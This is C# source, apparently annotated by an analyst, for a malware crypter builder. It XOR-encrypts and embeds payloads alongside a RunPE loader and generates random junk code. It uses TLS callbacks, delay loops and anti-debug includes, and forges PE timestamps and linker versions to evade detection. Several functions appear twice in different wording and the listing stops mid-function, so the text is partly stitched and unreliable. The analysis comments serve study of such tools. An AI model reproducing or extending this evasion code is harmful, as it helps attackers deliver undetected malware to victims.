/// <summary>
/// Runs the external assembler configured in <c>PE.PeDirectory.CompilerPath</c> on
/// <paramref name="PathName"/> and writes flat-binary output ("-f bin") to a new temp file.
/// </summary>
/// <param name="PathName">Assembler source file to build.</param>
/// <param name="PE">Build context supplying the compiler path and the include root ("-i").</param>
/// <returns>The temp file path if that file exists after the run; otherwise null.</returns>
public static string CompileArbitrary(string PathName, NewPE PE)
{
    string outputPath = Path.GetTempFileName();

    ProcessStartInfo startInfo = new ProcessStartInfo
    {
        Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", PE.PeDirectory.RootDirectoryPath, PathName, outputPath),
        FileName = PE.PeDirectory.CompilerPath,
        RedirectStandardOutput = true,
        UseShellExecute = false
    };

    using (Process compiler = Process.Start(startInfo))
    using (StreamReader compilerOutput = compiler.StandardOutput)
    {
        // Standard output is drained to end-of-stream and then discarded.
        string ignored = compilerOutput.ReadToEnd();
    }

    return File.Exists(outputPath) ? outputPath : null;
}
/// <summary>
/// Fills the size- and address-dependent fields of the optional header from the section
/// table: code/data sizes, bases, header and image size, entry point, and the import and
/// TLS data directories.
/// </summary>
/// <param name="PE">Build context whose sections already carry VirtualAddress/VirtualSize.</param>
/// <param name="nCountImportedModules">Not read by any live statement; only the commented-out _magic computation used it.</param>
/// <remarks>
/// Analysis note: AddressOfEntryPoint is .text's VirtualAddress plus
/// JunkInfo.SIZE_PRE_EP_FUNCTIONS, so the entry point is not at the start of .text and its
/// offset varies with that value.
/// </remarks>
public static void CalculateNtHeader(NewPE PE, int nCountImportedModules)
{
    // Sizes are rounded up to FileAlignment.
    PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
    PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) + ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#if TLS
    PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#endif
    PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress;
    PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // author's open question: should this be .data?
    PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment);
    // Image size = end of the last section, rounded up to SectionAlignment.
    PE.NtHeader.OptionalHeader.SizeOfImage = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment);
    PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS);
    // Disabled: uint _magic = (uint)((nCountImportedModules + 1) * 20);
    // The import directory covers the whole .idata section; the separate IAT directory
    // entries that depended on _magic are disabled.
    PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress;
    PE.NtHeader.OptionalHeader.ImportDirectory.Size = GetSectionByName(".idata", PE).VirtualSize;
    // TLS directory is placed in .data, after the RunPE object's bytes plus 16.
    // NOTE(review): the 16 presumably accounts for the 16-byte key — confirm against the data section source.
    // NOTE(review): as reconstructed from the collapsed listing, these two assignments run
    // unconditionally and are repeated verbatim under #if TLS below — confirm against the original file.
    PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
    PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#if TLS
    PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
    PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#endif
}
/// <summary>
/// Encodes the compiled RunPE object file in place with a 16-byte key, writes that key as
/// an assembler buffer to "runpe_key.inc" in the include directory, and rebuilds the data section.
/// </summary>
/// <param name="PE">Build context supplying the RunPE object path and include directory.</param>
/// <remarks>
/// Analysis note: the key is written out next to the encoded blob and is presumably
/// assembled into the data section by the rebuild that follows, so this step is
/// obfuscation, not confidentiality — the encoded region is recoverable statically once
/// the 16-byte key buffer is located.
/// </remarks>
public static void EncryptCodeAndAddKey(NewPE PE)
{
    byte[] pKey = new byte[16];
    // Keys.PopulateBuffer is not shown here; presumably fills pKey with random bytes.
    Keys.PopulateBuffer(pKey);
    byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
    // Return value is not captured, so the helper is assumed to transform pRunPE in place.
    Xor.EncodeDecodeData(pRunPE, pKey);
    if (File.Exists(PE.PeDirectory.RunPEObjectPath))
    {
        File.Delete(PE.PeDirectory.RunPEObjectPath);
    }
    PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);
    string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
    string Format = pKey.ToASMBuffer();
    if (File.Exists(KeyInclude))
    {
        File.Delete(KeyInclude);
    }
    File.WriteAllText(KeyInclude, Format);
    PEFactory.CompileDataSection(PE);
}
/// <summary>
/// Sets the constant fields of the PE file header and optional header for a 32-bit image.
/// </summary>
/// <param name="PE">Build context; its section list must already be populated (NumberOfSections is read from it).</param>
/// <remarks>
/// Analysis note: TimeDateStamp is drawn at random from [0x40000000, 0x4C000000)
/// (roughly 2004–2010 as a Unix time, assuming _Random is System.Random) and the linker
/// version is pinned to 6.0 to agree with the Rich header. Neither field reflects the real
/// build, so they carry no reliable dating or toolchain evidence. DllCharacteristics is 0,
/// i.e. no DYNAMIC_BASE / NX_COMPAT flags are set.
/// </remarks>
public static void InitializeNtHeader(NewPE PE)
{
    // <--- File Header --->
    {
        PE.NtHeader.FileHeader.Machine = 0x14c; // IMAGE_FILE_MACHINE_I386
        PE.NtHeader.FileHeader.NumberOfSections = (ushort)PE.Sections.Count;
        PE.NtHeader.FileHeader.TimeDateStamp = (uint)_Random.Next(0x40000000, 0x4C000000); // random, not the build time
        PE.NtHeader.FileHeader.PointerToSymbolTable = 0;
        PE.NtHeader.FileHeader.NumberOfSymbols = 0;
        PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0; // PE32 optional header size
        PE.NtHeader.FileHeader.Characteristics = 0x103; // RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE
    }
    // <--- Optional Header --->
    {
        // <--- LinkerVersions must match the Rich Signature --->
        PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06;
        PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00;
        PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4;
        PE.NtHeader.OptionalHeader.MajorImageVersion = 4;
        PE.NtHeader.OptionalHeader.MajorSubsystemVersion = 4;
        PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00;
        PE.NtHeader.OptionalHeader.ImageBase = 0x00400000;
        PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000;
        PE.NtHeader.OptionalHeader.FileAlignment = 0x200;
    }
}
/// <summary>
/// When <paramref name="_RemoveAntiDebug"/> is true, replaces the anti-debug include file
/// with an empty file; otherwise does nothing.
/// </summary>
/// <param name="PE">Build context supplying <c>PeDirectory.AntiDebugIncPath</c>.</param>
/// <param name="_RemoveAntiDebug">Whether to blank the include file.</param>
public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug)
{
    if (!_RemoveAntiDebug)
    {
        return;
    }

    // Delete, then recreate as a zero-length file so the include path still resolves.
    File.Delete(PE.PeDirectory.AntiDebugIncPath);
    File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty);
}
/// <summary>
/// Rewrites "tls_callback.inc": lines containing the ";[JUNK_NO_PRESERVE]" marker are
/// replaced by a generated filler buffer, lines containing ";[JUNK_FUNCS]" get generated
/// function buffers appended. Then records the assembled size in
/// <paramref name="JCI"/> and writes "payload_address.inc".
/// </summary>
/// <param name="PE">Build context supplying the include directory.</param>
/// <param name="JCI">Receives SIZE_TLS_CALLBACK; its other SIZE_* fields are read for the payload address.</param>
/// <param name="Multiplier">Scales the number of appended functions (3×..5×, upper bound exclusive if Rand is System.Random).</param>
/// <remarks>
/// Analysis note: the filler lengths and counts are drawn from Rand on every build, so the
/// byte content and size of this region differ between outputs of the same builder.
/// </remarks>
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
    string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
    // This first measurement is overwritten after the rewrite below before it is read.
    int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
    // Accumulated but never read in this method.
    int size_junk_added = 0;
    string[] tls = TlsCallbackInc.ReadLines();
    for (int i = 0; i < tls.Length; i++)
    {
        if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
        {
            int len_trash = Rand.Next(0x100, 0x200);
            byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            size_junk_added += trash_buffer.Length;
            // The marker line is replaced entirely by the assembler form of the buffer.
            tls[i] = trash_buffer.ToASMBuffer();
            trash_buffer = new byte[0];
            GC.Collect();
        }
        if (tls[i].Contains(";[JUNK_FUNCS]"))
        {
            int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);
            for (int jj = 0; jj < xx; jj++)
            {
                int func_len = Rand.Next(0x100, 0x120);
                byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);
                // The marker line is kept; each generated buffer is appended after it.
                tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
            }
        }
    }
    if (File.Exists(TlsCallbackInc))
    {
        File.Delete(TlsCallbackInc);
    }
    TlsCallbackInc.WriteLines(tls);
    sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
    JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;
    string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
    string Format = "PAYLOAD_ADDRESS EQU 0x{0}";
    // Payload offset = sum of the four generated-region sizes recorded in JCI.
    Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
    File.WriteAllText(AddrPayloadInc, Format);
    GC.Collect();
}
/// <summary>
/// Encodes the file at <paramref name="BindPath"/> with the key read from
/// <c>PE.PeDirectory.PayloadKeyIncPath</c>, Base64-encodes the result, and writes the
/// ASCII bytes to <c>PE.PeDirectory.BindIncPath</c>, replacing any existing file.
/// </summary>
/// <param name="PE">Build context supplying the key path and output path.</param>
/// <param name="BindPath">File whose contents are encoded.</param>
/// <remarks>
/// Analysis note: the key is the same file used for the main payload, so recovering it
/// once is enough to decode both blobs.
/// </remarks>
public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
{
    byte[] keyBytes = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
    byte[] bindBytes = BindPath.ReadBytes();

    // The helper's return value is unused; bindBytes is assumed to be transformed in place.
    Xor.EncodeDecodeData(bindBytes, keyBytes);

    string base64Text = Convert.ToBase64String(bindBytes);
    bindBytes = new ASCIIEncoding().GetBytes(base64Text);

    if (File.Exists(PE.PeDirectory.BindIncPath))
    {
        File.Delete(PE.PeDirectory.BindIncPath);
    }

    File.WriteAllBytes(PE.PeDirectory.BindIncPath, bindBytes);
}
/// <summary>
/// Creates the section headers in fixed order (.text, .idata, .data, and .bss when TLS is
/// defined) with only Name and Characteristics set, and adds them to <c>PE.Sections</c>.
/// </summary>
/// <param name="PE">Build context whose section list is populated.</param>
/// <remarks>
/// Analysis note: the section names and flags mimic an ordinary compiler layout, so the
/// section table alone does not distinguish the output from a conventionally linked image.
/// </remarks>
public static void InitializeSections(NewPE PE)
{
    // <--- Text Section --->
    {
        PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER()
        {
            Name = new char[] { '.', 't', 'e', 'x', 't' },
            Characteristics = 0x60000020 // CNT_CODE | MEM_EXECUTE | MEM_READ
        };
        PE.Sections.AddFirst(TextSectionHeader);
    }
    // <--- IData Section --->
    {
        PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER()
        {
            Name = new char[] { '.', 'i', 'd', 'a', 't', 'a' },
            Characteristics = 0x40000040 // CNT_INITIALIZED_DATA | MEM_READ
        };
        PE.Sections.AddLast(IDataSectionHeader);
    }
    // <--- Data Section --->
    {
        PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER()
        {
            Name = new char[] { '.', 'd', 'a', 't', 'a' },
            Characteristics = 0xC0000040 // CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
        };
        PE.Sections.AddLast(DataSectionHeader);
    }
#if TLS
    // <--- TLS Section --->
    {
        PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER()
        {
            Name = new char[] { '.', 'b', 's', 's' },
            Characteristics = 0xC0000040 // same flags as .data
        };
        PE.Sections.AddLast(TLSSectionHeader);
    }
#endif
}
/// <summary>
/// Writes "runpe_length.inc" defining RUNPE_CODE_LENGTH as the byte length of the RunPE
/// object file (8 hex digits), then rebuilds the text section.
/// </summary>
/// <param name="PE">Build context supplying the include directory and RunPE object path.</param>
public static void FixDecryptorLoop(NewPE PE)
{
    string lengthIncludePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");

    if (File.Exists(lengthIncludePath))
    {
        File.Delete(lengthIncludePath);
    }

    // The constant tells the assembled code how many bytes of the RunPE blob to process.
    string definition = string.Format(
        "RUNPE_CODE_LENGTH EQU 0x{0}",
        PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8"));

    File.WriteAllText(lengthIncludePath, definition);
    PEFactory.CompileTextSection(PE);
}
/// <summary>
/// Rewrites the delay-execution include file: every occurrence of the literal placeholder
/// "0x69" is replaced by a random 8-digit hex constant, and lines containing
/// ";[JUNK_NO_PRESERVE]" are replaced by one generated filler buffer.
/// </summary>
/// <param name="PE">Build context supplying <c>PeDirectory.DelayExecutionIncPath</c>.</param>
/// <param name="bLong">Selects the constant range: 25..50 when false, 17,500,000..30,000,000 when true
/// (upper bounds exclusive if Rand is System.Random).</param>
/// <remarks>
/// Analysis note: the constant is presumably the iteration count of a delay loop (inferred
/// from the file name — confirm against the include source). Because it is randomised per
/// build, the literal value is not a stable indicator; the surrounding loop structure is.
/// </remarks>
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
{
    string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();
    byte[] trash_buffer;
    // Both branches are identical: the filler length does not depend on bLong.
    if (!bLong)
    {
        int len_trash = Rand.Next(0x100, 0x120);
        trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
    }
    else
    {
        int len_trash = Rand.Next(0x100, 0x120);
        trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
    }
    for (int i = 0; i < olaf.Length; i++)
    {
        if (olaf[i].Contains("0x69"))
        {
            // A fresh random value is drawn for each matching line.
            if (!bLong)
            {
                olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
            }
            else
            {
                olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
            }
        }
        if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
        {
            // Both branches are identical: the same buffer is used for every marker line.
            if (!bLong)
            {
                olaf[i] = trash_buffer.ToASMBuffer();
            }
            else
            {
                olaf[i] = trash_buffer.ToASMBuffer();
            }
        }
    }
    File.Delete(PE.PeDirectory.DelayExecutionIncPath);
    PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
}
/// <summary>
/// Writes "tls_callback_offset.inc" defining TLS_CALLBACK_OFFSET as
/// SIZE_PRE_EP_FUNCTIONS + SIZE_EP_FUNCTION (8 hex digits), then rebuilds the data section.
/// </summary>
/// <param name="PE">Build context supplying the include directory and JunkInfo sizes.</param>
/// <remarks>
/// Analysis note: a TLS callback runs before the image's entry point, so code reached
/// through this offset executes ahead of AddressOfEntryPoint; analysis should start from
/// the TLS directory as well as the entry point.
/// </remarks>
public static void ConstructTLSCallback(NewPE PE)
{
    string offsetIncludePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");

    if (File.Exists(offsetIncludePath))
    {
        File.Delete(offsetIncludePath);
    }

    string definition = string.Format(
        "TLS_CALLBACK_OFFSET EQU 0x{0}",
        (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8"));

    // The file was just removed, so appending creates it with exactly this content.
    File.AppendAllText(offsetIncludePath, definition);

    // Only the data section is rebuilt; the TLS section rebuild is disabled in the original.
    PEFactory.CompileDataSection(PE);
}
/// <summary>
/// Appends to the main assembler file an alignment directive followed, for each section in
/// <c>PE.Sections</c>, by an upper-case label, an <c>incbin</c> of the matching object file
/// under "obj/", and another alignment directive.
/// </summary>
/// <param name="PE">Build context supplying the main file path, section list and FileAlignment.</param>
public static void AddSectionDatas(NewPE PE)
{
    // Pad the headers out to FileAlignment with zero bytes before the first section.
    File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
    File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
    File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
    foreach (PE_SECTION_HEADER SectionHeader in PE.Sections)
    {
        // ".text" becomes the label "TEXT:".
        string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":");
        File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
        File.AppendAllText(PE.PeDirectory.MainPath, WriteableName);
        File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
        // GetObjPathFromSectionName returns null when no object file matches; Path.GetFileName(null)
        // is null, which formats as an empty name.
        File.AppendAllText(PE.PeDirectory.MainPath, string.Format(
            "\tincbin \"obj/{0}\"",
            Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE))));
        File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
        File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
        // Each section's raw data is padded to FileAlignment.
        File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
        File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
    }
}
/// <summary>
/// Encodes the file at <paramref name="PayloadPath"/> with a 16-byte key, Base64-encodes
/// the result, and writes three files to the include directory: "payload_length.inc"
/// (length of the Base64 text), "payload_key.bin" (the raw key) and "payload.bin" (the
/// Base64 text as ASCII).
/// </summary>
/// <param name="PE">Build context supplying the include directory.</param>
/// <param name="PayloadPath">File whose contents are encoded.</param>
/// <remarks>
/// Analysis note: the embedded blob is Base64 text, which lowers byte entropy compared with
/// the raw encoded bytes, and the 16-byte key is stored beside it. Locating a long Base64
/// run next to a 16-byte buffer is therefore enough to recover the original file
/// statically (assuming Xor.EncodeDecodeData is a repeating-key XOR — helper not shown).
/// </remarks>
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
{
    byte[] pKey = new byte[16];
    // Keys.PopulateBuffer is not shown here; presumably fills pKey with random bytes.
    Keys.PopulateBuffer(pKey);
    byte[] pFileBuffer = PayloadPath.ReadBytes();
    // Return value is not captured, so the helper is assumed to transform pFileBuffer in place.
    Xor.EncodeDecodeData(pFileBuffer, pKey);
    pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));
    string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
    string Format = "PAYLOAD_LENGTH EQU 0x{0}";
    // Length is that of the Base64 text, not of the original file.
    Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));
    if (File.Exists(PayloadLengthInclude))
    {
        File.Delete(PayloadLengthInclude);
    }
    File.WriteAllText(PayloadLengthInclude, Format);
    string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
    string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");
    if (File.Exists(PayloadKeyInclude))
    {
        File.Delete(PayloadKeyInclude);
    }
    if (File.Exists(PayloadInclude))
    {
        File.Delete(PayloadInclude);
    }
    File.WriteAllBytes(PayloadKeyInclude, pKey);
    File.WriteAllBytes(PayloadInclude, pFileBuffer);
}
/// <summary>
/// Finds the first file in the object directory whose name without extension equals
/// <paramref name="Name"/> with leading and trailing dots removed.
/// </summary>
/// <param name="Name">Section name such as ".text".</param>
/// <param name="PE">Build context supplying <c>PeDirectory.ObjDirectory</c>.</param>
/// <returns>The full path of the first match, or null when nothing matches.</returns>
private static string GetObjPathFromSectionName(string Name, NewPE PE)
{
    foreach (string candidate in Directory.GetFiles(PE.PeDirectory.ObjDirectory))
    {
        if (Path.GetFileNameWithoutExtension(candidate) == Name.Trim('.'))
        {
            return candidate;
        }
    }

    return null;
}
/// <summary>
/// Inserts generated filler buffers into the text-section source ahead of the
/// ";[PRE_EP_FUNCTIONS]", ";[EP_FUNCTION]" and ";[POST_EP_FUNCTIONS]" markers, records the
/// total bytes inserted for each region in <paramref name="JCI"/>, and rewrites the file as ASCII.
/// </summary>
/// <param name="PE">Build context supplying <c>PeDirectory.TextSectionPath</c>.</param>
/// <param name="JCI">Receives SIZE_PRE_EP_FUNCTIONS, SIZE_EP_FUNCTION and SIZE_POST_EP_FUNCTIONS.</param>
/// <param name="Multiplier">Scales the number of buffers inserted before and after the entry point (5×..10× each).</param>
/// <remarks>
/// Analysis note: counts, lengths and the choice between the two generators are drawn from
/// Rand on each build, so the code surrounding the real entry-point logic differs in size
/// and content between outputs. The recorded sizes are what the header code uses to locate
/// the entry point, so the filler is laid out before it rather than executed as part of it
/// (inferred from how SIZE_PRE_EP_FUNCTIONS is consumed elsewhere on this page).
/// </remarks>
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
    string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();
    int size_pre_ep = 0;
    int size_ep = 0;
    int size_post_ep = 0;
    int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
    int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
    // Region before the entry point.
    for (int i = 0; i < pre_ep_func_cnt; i++)
    {
        // Inserting at the marker's index leaves the marker in place after the new text,
        // so each iteration finds it again.
        int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x200);
            byte[] func_buffer;
            // Roughly half the buffers come from DataConstructor, the rest from GenerateLogicalFunction.
            if (Rand.NextDouble() >= 0.5)
            {
                func_buffer = new DataConstructor().GenData(func_len, func_len);
            }
            else
            {
                func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            }
            // (Disabled in the original: entropy printout and zero padding after each buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_pre_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;
    // Entry-point region: a single generated buffer.
    {
        int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x140);
            byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            // (Disabled in the original: zero padding after the buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_EP_FUNCTION = size_ep;
    // Region after the entry point; same scheme as the first loop.
    for (int i = 0; i < post_ep_func_cnt; i++)
    {
        int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x200);
            byte[] func_buffer;
            if (Rand.NextDouble() >= 0.5)
            {
                func_buffer = new DataConstructor().GenData(func_len, func_len);
            }
            else
            {
                func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            }
            // (Disabled in the original: entropy printout and zero padding after each buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_post_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;
    // (Disabled in the original: a zero-filled "zerofill.bin" entropy pad and SIZE_ENTROPY_PAD.)
    if (File.Exists(PE.PeDirectory.TextSectionPath))
    {
        File.Delete(PE.PeDirectory.TextSectionPath);
    }
    PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);
    GC.Collect();
}
/// <summary>
/// Invokes the configured external assembler on <paramref name="PathName"/>, asking for
/// flat-binary output ("-f bin") in a freshly created temp file.
/// </summary>
/// <param name="PathName">Assembler source file to build.</param>
/// <param name="PE">Build context supplying the compiler path and the include root ("-i").</param>
/// <returns>The temp file path if that file exists after the run; otherwise null.</returns>
public static string CompileArbitrary(string PathName, NewPE PE)
{
    string tempOutput = Path.GetTempFileName();

    ProcessStartInfo assemblerInfo = new ProcessStartInfo
    {
        Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", PE.PeDirectory.RootDirectoryPath, PathName, tempOutput),
        FileName = PE.PeDirectory.CompilerPath,
        RedirectStandardOutput = true,
        UseShellExecute = false
    };

    using (Process assembler = Process.Start(assemblerInfo))
    using (StreamReader outputReader = assembler.StandardOutput)
    {
        // Read stdout to the end; the text itself is not used.
        string unused = outputReader.ReadToEnd();
    }

    if (!File.Exists(tempOutput))
    {
        return null;
    }

    return tempOutput;
}
/// <summary>Builds the TLS section, which CompileSection addresses by the key "bss".</summary>
/// <param name="PE">Build context passed through to CompileSection.</param>
public static void CompileTLSSection(NewPE PE)
{
    const string sectionKey = "bss";
    CompileSection(sectionKey, PE);
}
/// <summary>
/// Overwrites the entry in <c>PE.Sections</c> whose name equals <paramref name="Name"/>
/// with <paramref name="NewSection"/>.
/// </summary>
/// <param name="Name">Section name including the leading dot, e.g. ".text".</param>
/// <param name="NewSection">Header value to store in the list node.</param>
/// <param name="PE">Build context owning the section list.</param>
private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE)
{
    // Look up the current value first, then locate its list node and swap the value in place.
    PE_SECTION_HEADER current = GetSectionByName(Name, PE);
    var node = PE.Sections.Find(current);
    node.Value = NewSection;
}
/// <summary>
/// Returns the first file in the object directory whose extension-less name matches
/// <paramref name="Name"/> after stripping leading and trailing dots.
/// </summary>
/// <param name="Name">Section name such as ".text".</param>
/// <param name="PE">Build context supplying <c>PeDirectory.ObjDirectory</c>.</param>
/// <returns>The full path of the first match, or null when nothing matches.</returns>
private static string GetObjPathFromSectionName(string Name, NewPE PE)
{
    string[] objectFiles = Directory.GetFiles(PE.PeDirectory.ObjDirectory);
    return objectFiles.FirstOrDefault(objectFile => Path.GetFileNameWithoutExtension(objectFile) == Name.Trim('.'));
}
/// <summary>
/// Maps a section key ("text", "data", "idata", "bss", "runpe", "main") to its source and
/// output paths, deletes any existing output, and runs the external assembler in
/// flat-binary mode ("-f bin").
/// </summary>
/// <param name="SectionName">Section key; any other value leaves both paths empty.</param>
/// <param name="_PE">Build context supplying all paths and the compiler location.</param>
private static void CompileSection(string SectionName, NewPE _PE)
{
    string sourcePath = string.Empty;
    string outputPath = string.Empty;

    if (SectionName == "text")
    {
        sourcePath = _PE.PeDirectory.TextSectionPath;
        outputPath = _PE.PeDirectory.TextObjectPath;
    }
    else if (SectionName == "data")
    {
        sourcePath = _PE.PeDirectory.DataSectionPath;
        outputPath = _PE.PeDirectory.DataObjectPath;
    }
    else if (SectionName == "idata")
    {
        sourcePath = _PE.PeDirectory.IDataSectionPath;
        outputPath = _PE.PeDirectory.IDataObjectPath;
    }
    else if (SectionName == "bss")
    {
        sourcePath = _PE.PeDirectory.TLSSectionPath;
        outputPath = _PE.PeDirectory.TLSObjectPath;
    }
    else if (SectionName == "runpe")
    {
        sourcePath = _PE.PeDirectory.RunPESectionPath;
        outputPath = _PE.PeDirectory.RunPEObjectPath;
    }
    else if (SectionName == "main")
    {
        // "main" assembles the final image: its output is the save path, not an object file.
        sourcePath = _PE.PeDirectory.MainPath;
        outputPath = _PE.PeDirectory.SavePath;
    }

    if (File.Exists(outputPath))
    {
        File.Delete(outputPath);
    }

    ProcessStartInfo startInfo = new ProcessStartInfo
    {
        Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", _PE.PeDirectory.RootDirectoryPath, sourcePath, outputPath),
        FileName = _PE.PeDirectory.CompilerPath,
        RedirectStandardOutput = true,
        UseShellExecute = false
    };

    using (Process compiler = Process.Start(startInfo))
    using (StreamReader compilerOutput = compiler.StandardOutput)
    {
